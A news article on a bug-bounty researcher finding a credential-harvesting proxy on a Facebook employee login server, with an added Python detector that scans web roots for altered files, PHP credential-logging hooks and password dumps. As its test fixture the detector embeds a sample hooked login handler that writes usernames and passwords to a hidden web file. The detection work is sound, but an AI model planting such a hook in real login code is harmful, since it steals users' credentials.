Tsai said that the hacker had placed a proxy in front of the employee login page, so that every username and password submitted through it was written to a directory on the server from which the attacker could collect them at any time.
Credentials harvested into that web directory could in turn have been used to log in to email accounts, virtual private networks and other internal tools, since the same password may well have been used for several of them.
There is also the chance that Facebook employees reused those credentials on personal accounts such as email and other social networks. Some may even have used the same username, which would make it easier for an attacker to reach their other accounts.
Even if Facebook's user data is stored on separate servers or networks, credentials taken from corporate accounts could still have been a way in. Tsai said that about 300 credentials had already been logged by the time the proxy was found.
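The check a defender would want after reading the paragraphs above is whether a login handler has been modified to log credentials and whether a harvested-credential dump is sitting in a web-accessible directory. The following script is an added example written for this article; it is not DEVCORE's, Facebook's, or the other researcher's code, and it does not reproduce what was actually found on the Facebook server. The login handlers, the dump file and the deployment baseline are constructed inline, and the regexes for "request credential field flowing into a file-write or exfiltration sink" are an assumption about what such a hook typically looks like in PHP.

```python
"""Detect a credential-logging hook in a PHP login handler, files that differ from
a deployment baseline, and harvested-credential dumps under a web root.

Added example for this article, not code from DEVCORE or Facebook. All inputs
below are constructed; the sink/source patterns are heuristic assumptions.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed: a benign login handler, and the same handler with an injected logger.
CLEAN_LOGIN = """<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if (authenticate($user, $pass)) { header('Location: /home'); }
"""

HOOKED_LOGIN = """<?php
$user = $_POST['username'];
$pass = $_POST['password'];
@file_put_contents('/var/www/html/assets/.cache', "$user:$pass\\n", FILE_APPEND);
if (authenticate($user, $pass)) { header('Location: /home'); }
"""

# Assumed patterns: request fields that carry credentials, assignments that
# propagate them into local variables, and sinks that write or send data.
CRED_KEY = re.compile(
    r"\$_(?:POST|REQUEST)\[\s*['\"](?:user(?:name)?|login|email|pass(?:word|wd)?|pwd)['\"]\s*\]",
    re.I,
)
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(\$_(?:POST|REQUEST)\[[^\]]+\])")
SINK = re.compile(
    r"\b(file_put_contents|fwrite|fputs|error_log|mail|curl_setopt|file_get_contents)\s*\(([^;]*)\)",
    re.I,
)
# A line of the form <user><sep><secret> with no other whitespace.
DUMP_LINE = re.compile(r"^[\w.@+-]{1,64}[:|,;\t ][^\s]{1,128}$")


def find_credential_hooks(php_source: str):
    """Return (line_no, sink_name) for each sink call fed by a request credential field."""
    tainted = {var for var, src in ASSIGN.findall(php_source) if CRED_KEY.search(src)}
    hits = []
    for n, line in enumerate(php_source.splitlines(), 1):
        for m in SINK.finditer(line):
            args = m.group(2)
            direct = CRED_KEY.search(args) is not None
            via_var = any(re.search(re.escape(v) + r"\b", args) for v in tainted)
            if direct or via_var:
                hits.append((n, m.group(1)))
    return hits


def looks_like_credential_dump(text: str, min_lines: int = 3) -> bool:
    """True when most non-empty lines look like user:secret pairs."""
    lines = [l for l in text.splitlines() if l.strip()]
    matched = sum(1 for l in lines if DUMP_LINE.match(l))
    return matched >= min_lines and matched >= 0.8 * len(lines)


def scan_webroot(webroot: Path, baseline: dict):
    """Walk a web root and report: files whose SHA-256 differs from the baseline,
    files the baseline does not know, hooked PHP handlers, and credential dumps."""
    findings = []
    for path in sorted(p for p in webroot.rglob("*") if p.is_file()):
        rel = path.relative_to(webroot).as_posix()
        data = path.read_bytes()
        digest = hashlib.sha256(data).hexdigest()
        if rel not in baseline:
            findings.append(("unexpected", rel))
        elif baseline[rel] != digest:
            findings.append(("modified", rel))
        text = data.decode("utf-8", errors="replace")
        if path.suffix == ".php":
            for n, sink in find_credential_hooks(text):
                findings.append(("credential-hook", f"{rel}:{n} {sink}"))
        elif looks_like_credential_dump(text):
            findings.append(("credential-dump", rel))
    return findings


def demo() -> list:
    """Build a constructed web root in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "login.php").write_text(HOOKED_LOGIN)
        (root / "index.php").write_text("<?php echo 'hello';\n")
        (root / "assets").mkdir()
        # Constructed dump, the kind of file a logging hook leaves behind.
        (root / "assets" / ".cache").write_text(
            "alice:Summ3r!2016\nbob@example.com:hunter2\ncarol:P@ssw0rd\n"
        )
        baseline = {  # hashes of what was deployed, not of what is on disk now
            "login.php": hashlib.sha256(CLEAN_LOGIN.encode()).hexdigest(),
            "index.php": hashlib.sha256(b"<?php echo 'hello';\n").hexdigest(),
        }
        return scan_webroot(root, baseline)


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind:16} {detail}")
```

The baseline comparison is the reliable part: a login page that differs from what was deployed is worth a look regardless of what the regexes say. The hook and dump heuristics are there to tell you what to look at first, and they will miss a hook that obfuscates its sink or encodes its output.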
Tsai's job was to test the Facebook network for vulnerabilities that others could exploit, a practice known as penetration testing: find a valid vulnerability and report it to the company concerned. Such testers are often described as ethical, or white hat, hackers.
Tsai's reward came from the social network's Bug Bounty program. Facebook pays bounties to those who discover vulnerabilities, bugs and glitches that could otherwise be used to disrupt the service.
"With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in 2012, Facebook launched the Bug Bounty Program, which even motivated me to give it a shot. Of course, Bug Bounty is nothing about firing random attacks without restrictions. By comparing your findings with the permitted actions set forth by Bug Bounty, the overlapping part will be the part worth trying," Tsai wrote in his own blog post.
Tsai alerted Facebook regarding the vulnerability in February. After the incident was reported, Facebook conducted an internal investigation.
On April 20, the investigation officially ended and Devcore was given permission to publish the details of the hack. Fortunately, the other hacker turned out to be a researcher too, not a black or gray hat: he or she had also been looking for vulnerabilities in the network.
Facebook did not name the other hacker or say whether he or she was awarded a bounty. The company did not seem troubled that a vulnerability which could have exposed billions of people's accounts to an attacker had existed at all.
The company commented on Hacker News: "This is Reginaldo from the Facebook Security team. We're really glad Orange reported this to us. On this case, the software we were using is third party. As we don't have full control of it, we ran it isolated from the systems that host the data people share on Facebook. We do this precisely to have better security, as chromakode mentioned. After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infrastructure so, the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access."
Despite the interesting find, both hackers seem to have gone well beyond basic penetration testing. The first hacker, who set up the proxy and collected the login credentials, had already stumbled upon a serious vulnerability, yet apparently kept looking for something bigger before reporting to Facebook.
Even Tsai stepped a little out of line, according to Sophos. However, he would not have found the earlier hacker's tracks had he not done so. Either way, it was a risky win-win for Facebook.
Had either of the hackers not been a security researcher, or not been looking because of the Facebook Bug Bounty program, the credentials would have been lost. That is one of the reasons Facebook runs a program for such vulnerabilities: to discourage hackers from exploiting them for their own benefit.
Author: Lord Marin